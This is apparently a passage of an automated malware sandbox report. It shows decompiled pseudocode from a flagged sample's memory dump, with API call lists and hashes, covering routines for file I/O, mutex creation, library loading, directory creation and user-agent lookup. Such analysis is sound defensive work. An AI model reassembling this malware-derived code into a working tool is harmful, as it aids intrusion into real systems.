                                                                                                                                                                                                						L7:
                                                                                                                                                                                                						_t106 = _t106 + 0x20;
                                                                                                                                                                                                						_t112 = _t112 + 1;
                                                                                                                                                                                                					} while (_t106 < 0x1000);
                                                                                                                                                                                                					goto L19;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t58 = 0;
                                                                                                                                                                                                				goto L20;
                                                                                                                                                                                                			}

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                			E00AFA6EB(void* __ecx, signed int _a4, intOrPtr* _a8) {
                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                				char _t60;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t50 = _a4;
                                                                                                                                                                                                				_t60 = 0;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                					_t47 = E00AFA67D(_t50);
                                                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                                                						L11:
                                                                                                                                                                                                						_t26 = 0;
                                                                                                                                                                                                						L12:
                                                                                                                                                                                                						L13:
                                                                                                                                                                                                						return _t26;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t27 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                                                                                                                                                                                                					if(_t58 == 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t29 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                							E00AF85FB( &_v12, 0);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t4 = _t58 + 1; // 0x1
                                                                                                                                                                                                					_t34 = E00AF85E5(_t4); // executed
                                                                                                                                                                                                					_t60 = _t34;
                                                                                                                                                                                                					_v12 = _t60;
                                                                                                                                                                                                					if(_t60 == 0) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_a4 = _a4 & 0;
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                					_push( &_a4);
                                                                                                                                                                                                					_push(_t58);
                                                                                                                                                                                                					_push(_t60);
                                                                                                                                                                                                					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                							if(_v8 != _t58) {
                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t39 = _a8;
                                                                                                                                                                                                							 *((char*)(_t58 + _t60)) = 0;
                                                                                                                                                                                                							if(_t39 != 0) {
                                                                                                                                                                                                								 *_t39 = _t58;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							FindCloseChangeNotification(_t47);
                                                                                                                                                                                                							_t26 = _t60;
                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t55 = _v8 + _a4;
                                                                                                                                                                                                						_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push( &_a4);
                                                                                                                                                                                                						_v8 = _t55;
                                                                                                                                                                                                						_push(_t58 - _t55);
                                                                                                                                                                                                						_push(_t55 + _t60);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                			}















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00AFFA98,00000000,00AFF8F7,00B1EFE0,00B0B98C,00000000,00B0B98C,00000000,00000000,00000615), ref: 00AFA775
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00AFFA98,00000000,00AFF8F7,00B1EFE0,00B0B98C,00000000,00B0B98C,00000000,00000000,00000615,0000034A,00000000,04D3FB08,00000400), ref: 00AFA7B8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFileFindNotificationRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1200561807-0
                                                                                                                                                                                                • Opcode ID: 035647912d50d9bd596ba1c24fea76015a802142d0fc26d8dfa81fa0b5a24796
                                                                                                                                                                                                • Instruction ID: 635f4cee983500f0b34f73ca8d9c49f768cc140e75b4c71f036a72b04a9d2e4f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 035647912d50d9bd596ba1c24fea76015a802142d0fc26d8dfa81fa0b5a24796
                                                                                                                                                                                                • Instruction Fuzzy Hash: F92151B6600209AFDB11DFA4DD84FFA77BCAF64740F10856ABA09D7251EA70D940CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                			E00AF1521(void* __ecx, void* __edx) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                				signed int _t4;
                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t3 = CreateMutexA(0, 0, 0); // executed
                                                                                                                                                                                                				 *0xb0e6f4 = _t3;
                                                                                                                                                                                                				if(_t3 == 0) {
                                                                                                                                                                                                					L11:
                                                                                                                                                                                                					_t4 = _t3 | 0xffffffff;
                                                                                                                                                                                                					__eflags = _t4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t3 = CreateMutexA(0, 0, 0);
                                                                                                                                                                                                					 *0xb0e6dc = _t3;
                                                                                                                                                                                                					if(_t3 == 0) {
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t3 = E00AF1080(0x4ac);
                                                                                                                                                                                                						_v8 = _t3;
                                                                                                                                                                                                						if(_t3 == 0) {
                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *0xb0e6e8 = E00AF9187(_t3, 0);
                                                                                                                                                                                                							E00AF85A3( &_v8);
                                                                                                                                                                                                							_t7 = E00AF85E5(0x100);
                                                                                                                                                                                                							 *0xb0e6f0 = _t7;
                                                                                                                                                                                                							if(_t7 != 0) {
                                                                                                                                                                                                								 *0xb0e6fc = 0;
                                                                                                                                                                                                								_t9 = E00AF85E5(0x401);
                                                                                                                                                                                                								 *0xb0e6d4 = _t9;
                                                                                                                                                                                                								__eflags = _t9;
                                                                                                                                                                                                								if(_t9 != 0) {
                                                                                                                                                                                                									__eflags =  *0xb0e6c0; // 0x0
                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                										E00B015EE(E00AF81E3, 0xaf81ec);
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_push(0x61e);
                                                                                                                                                                                                									_t24 = 8;
                                                                                                                                                                                                									_t10 = E00AFE1FE(0xb0bd20, _t24); // executed
                                                                                                                                                                                                									 *0xb0e6a0 = _t10;
                                                                                                                                                                                                									_t4 = 0;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_push(0xfffffffc);
                                                                                                                                                                                                									goto L5;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_push(0xfffffffe);
                                                                                                                                                                                                								L5:
                                                                                                                                                                                                								_pop(_t4);
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,?,?,00AF56FA), ref: 00AF152B
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00AF56FA), ref: 00AF1541
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutex$AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 704353917-0
                                                                                                                                                                                                • Opcode ID: e0257d53ede65d9cbe7e97578036a8bd2df063e29f77d6720906093dba30a909
                                                                                                                                                                                                • Instruction ID: 1bed7fbfdd067c19bc9799a712d49a4fc4d0dd790e80f74d1d98407e67654069
                                                                                                                                                                                                • Opcode Fuzzy Hash: e0257d53ede65d9cbe7e97578036a8bd2df063e29f77d6720906093dba30a909
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1611A770A0520EEAEB149BF6BD15D377AA5EBF17607200A2AF722CB1D0FF71C5008615
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E00AFE1FE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _t5;
                                                                                                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                				_t22 = __edx;
                                                                                                                                                                                                				_t5 = E00AF95A8(_a4);
                                                                                                                                                                                                				_t25 = 0;
                                                                                                                                                                                                				_v8 = _t5;
                                                                                                                                                                                                				_push(_t5);
                                                                                                                                                                                                				if(_a4 != 0x7c3) {
                                                                                                                                                                                                					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t7 = GetModuleHandleA();
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                					_t10 = E00AFE1B3(_t12, _t22, _t7); // executed
                                                                                                                                                                                                					_t25 = _t10;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E00AF85A3( &_v8);
                                                                                                                                                                                                				return _t25;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,00B0BA20), ref: 00AFE220
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,00B0BA20), ref: 00AFE22D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4133054770-0
                                                                                                                                                                                                • Opcode ID: 9f8ea93e4b49e53c55ad3a0b93e3708f77ad60a2f1fd3886e01231263083226d
                                                                                                                                                                                                • Instruction ID: 54d7173adea0368ac2367046114dbea322e5341e281d587e5991f1b88a6a13a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8ea93e4b49e53c55ad3a0b93e3708f77ad60a2f1fd3886e01231263083226d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F089316001189BDB04ABE9ED458EAB3ED9BA43507144129F605D7161ED70DE408690
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                                                                			E00AF2C82(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                                                                                                                                                                                				WCHAR* _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                				char _v564;
                                                                                                                                                                                                				char _v1084;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t25;
                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                				char _t38;
                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                				WCHAR* _t41;
                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                				char* _t60;
                                                                                                                                                                                                				char* _t63;
                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                				WCHAR* _t71;
                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t70 = __ecx;
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				E00AFB742(__edx,  &_v44, __eflags, __fp0);
                                                                                                                                                                                                				_t52 = _t70;
                                                                                                                                                                                                				if(E00AFBBCF(_t70) == 0) {
                                                                                                                                                                                                					_t23 = E00AF2B97( &_v1084, _t70, 0x104); // executed
                                                                                                                                                                                                					_pop(_t54);
                                                                                                                                                                                                					__eflags = _t23;
                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                						_t71 = E00AF2C57( &_v1084, __eflags);
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						E00AFB054(_t54,  &_v564); // executed
                                                                                                                                                                                                						_t32 = E00AF109A(_t54, 0x375);
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_v12 = _t32;
                                                                                                                                                                                                						_push( &_v44);
                                                                                                                                                                                                						_t60 = "\\";
                                                                                                                                                                                                						_push(_t60);
                                                                                                                                                                                                						_push(_t32);
                                                                                                                                                                                                						_push(_t60);
                                                                                                                                                                                                						_push( &_v564);
                                                                                                                                                                                                						_push(_t60);
                                                                                                                                                                                                						_t71 = E00AF92C6( &_v1084);
                                                                                                                                                                                                						E00AF85B6( &_v12);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t38 = E00AF109A(_t52, 0x4e0);
                                                                                                                                                                                                					 *_t73 = 0x104;
                                                                                                                                                                                                					_v12 = _t38;
                                                                                                                                                                                                					_t39 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                                                                                                                                                                                                					_t78 = _t40;
                                                                                                                                                                                                					if(_t40 != 0) {
                                                                                                                                                                                                						_t41 = E00AF109A( &_v564, 0x375);
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_v8 = _t41;
                                                                                                                                                                                                						_push( &_v44);
                                                                                                                                                                                                						_t63 = "\\";
                                                                                                                                                                                                						_push(_t63);
                                                                                                                                                                                                						_push(_t41);
                                                                                                                                                                                                						_push(_t63);
                                                                                                                                                                                                						_t71 = E00AF92C6( &_v564);
                                                                                                                                                                                                						E00AF85B6( &_v8);
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t71 = E00AF2C57( &_v44, _t78);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF85B6( &_v12);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v8 = _t71;
                                                                                                                                                                                                				_t25 = E00AFB2AB(_t71);
                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                					_t27 = CreateDirectoryW(_t71, _t25); // executed
                                                                                                                                                                                                					if(_t27 == 0 || E00AFB2AB(_t71) == 0) {
                                                                                                                                                                                                						E00AF85FB( &_v8, 0xfffffffe);
                                                                                                                                                                                                						_t71 = _v8;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t71;
                                                                                                                                                                                                			}
























                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00AF2D94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4241100979-0
                                                                                                                                                                                                • Opcode ID: 338d297fcaf426ad1ee491033a2875f4d56b6cae2835724f2cbccf2e7717752e
                                                                                                                                                                                                • Instruction ID: fe5a187c8b88dbf982c769d52c49aecaaa5f48dd822a02c75cf3f348396b969d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 338d297fcaf426ad1ee491033a2875f4d56b6cae2835724f2cbccf2e7717752e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89315EB291021CABDB14B7E4CE56AFE76BCAB04310F040169BB05E7181EF749E448761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5AF2(void* __edx, void* __fp0) {
                                                                                                                                                                                                				short _v30;
                                                                                                                                                                                                				short _v32;
                                                                                                                                                                                                				short _v34;
                                                                                                                                                                                                				short _v36;
                                                                                                                                                                                                				intOrPtr* _t16;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t46 = __fp0;
                                                                                                                                                                                                				_t38 = __edx;
                                                                                                                                                                                                				_t39 = 0;
                                                                                                                                                                                                				_t16 = E00AF85E5(0x14);
                                                                                                                                                                                                				_t32 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_t40 = _t16;
                                                                                                                                                                                                				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
                                                                                                                                                                                                					_v36 =  *((intOrPtr*)(_t32 + 0x228));
                                                                                                                                                                                                					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
                                                                                                                                                                                                					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
                                                                                                                                                                                                					_v30 = 0;
                                                                                                                                                                                                					GetDriveTypeW( &_v36); // executed
                                                                                                                                                                                                				}
                                                                                                                                                                                                				 *_t40 = 2;
                                                                                                                                                                                                				 *(_t40 + 4) = _t39;
                                                                                                                                                                                                				_t17 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
                                                                                                                                                                                                				_t18 = E00AF5A6E( *((intOrPtr*)(_t17 + 0x224)), _t38, _t46);
                                                                                                                                                                                                				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
                                                                                                                                                                                                				if(_t18 == 0) {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					if(E00AF2DBE() == 0) {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t39 = _t39 | 0xffffffff;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t38 = 0x3b;
                                                                                                                                                                                                					if(E00AFA2AE(_t18, _t38) != 0) {
                                                                                                                                                                                                						L6:
                                                                                                                                                                                                						E00AF4D60(_t40, _t38, _t46);
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E00AFA389();
                                                                                                                                                                                                				E00AFA389();
                                                                                                                                                                                                				return _t39;
                                                                                                                                                                                                			}
















                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetDriveTypeW.KERNELBASE(?), ref: 00AF5B42
                                                                                                                                                                                                  • Part of subcall function 00AF4D60: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00AF4DB3
                                                                                                                                                                                                  • Part of subcall function 00AF4D60: GetModuleHandleA.KERNEL32(00000000), ref: 00AF4DBA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule$AllocateDriveHeapType
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2730524069-0
                                                                                                                                                                                                • Opcode ID: 165ac56063869a8a66b434ca96fec131eeec96842b6a788b1997ca30ffcbad9a
                                                                                                                                                                                                • Instruction ID: 50781058b4bee2f2a3d93ae15b1cc4920d2f04b39b6db6df342718dd4bdc1e07
                                                                                                                                                                                                • Opcode Fuzzy Hash: 165ac56063869a8a66b434ca96fec131eeec96842b6a788b1997ca30ffcbad9a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F11C139A007098AD724AFF1E9086FA73F4AF58764F004539FA19CB291FB31D842CB55
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                                                                			E00AFE492(void* __ecx, void* __edx) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				intOrPtr* _t5;
                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                				intOrPtr* _t11;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t5 =  *0xb0e6b0; // 0x4d3fdd8
                                                                                                                                                                                                				if( *_t5 == 0) {
                                                                                                                                                                                                					_v8 = E00AF95A8(0x2a7);
                                                                                                                                                                                                					 *0xb0e788 = E00AF9187(_t6, 0);
                                                                                                                                                                                                					E00AF85A3( &_v8);
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_v8 = 0x100;
                                                                                                                                                                                                					_t10 = E00AF85E5(0x101);
                                                                                                                                                                                                					 *0xb0e788 = _t10;
                                                                                                                                                                                                					_t11 =  *0xb0e6b0; // 0x4d3fdd8
                                                                                                                                                                                                					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                                                                                                                                                                                					if(_t12 == 0) {
                                                                                                                                                                                                						L4:
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						return E00AF85FB(0xb0e788, 0xffffffff) | 0xffffffff;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}








                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,00AFE539), ref: 00AFE4C3
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AgentAllocateFreeObtainStringUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 471734292-0
                                                                                                                                                                                                • Opcode ID: ccef8653aae9448a60d49e80e0cff94f842418937f6fd66bb90b5314c222ca62
                                                                                                                                                                                                • Instruction ID: 8caf4cfd05b8249b58f3bc49bfa352cdee1245ab0847706ba518c42f8c60871b
                                                                                                                                                                                                • Opcode Fuzzy Hash: ccef8653aae9448a60d49e80e0cff94f842418937f6fd66bb90b5314c222ca62
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0C230604208EBE749EBF4DE067AA77E09B50320F600668B221D31E0EE74DE40C611
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                			E00AFA69E(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t23 = __ecx;
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                				_t21 = __edx;
                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                					L3:
                                                                                                                                                                                                					_t13 = 1;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t26 = _t26 + _v8;
                                                                                                                                                                                                						_t23 = _v12;
                                                                                                                                                                                                						if(_t26 < _a4) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t13 = 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L4:
                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00AF8F32,?), ref: 00AFA6CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                • Opcode ID: df24a98b480644dbf4832a3bdb96d9bc756450f1c753bbc8a788674687782d1b
                                                                                                                                                                                                • Instruction ID: e89ff1f37740173c6cf7b3c7614084c4c7d886d616361a4c608612a88542af8e
                                                                                                                                                                                                • Opcode Fuzzy Hash: df24a98b480644dbf4832a3bdb96d9bc756450f1c753bbc8a788674687782d1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF017B2A10118BFDB50CFE8CD84BEABBACEB14780F144569B609E7100D671EE40DBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85FB(char _a4, intOrPtr _a8) {
                                                                                                                                                                                                				char _t3;
                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t3 = _a4;
                                                                                                                                                                                                				if(_t3 == 0) {
                                                                                                                                                                                                					return _t3;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t9 =  *_t3;
                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                					 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                                                					_t4 = _a8;
                                                                                                                                                                                                					if(_t4 != 0xffffffff) {
                                                                                                                                                                                                						if(_t4 == 0xfffffffe) {
                                                                                                                                                                                                							_t4 = E00AFC3D4(_t9);
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t4 = E00AFC3BB(_t9);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF8730(_t9, 0, _t4);
                                                                                                                                                                                                					_t3 = RtlFreeHeap( *0xb0e768, 0, _t9); // executed
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t3;
                                                                                                                                                                                                			}







                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
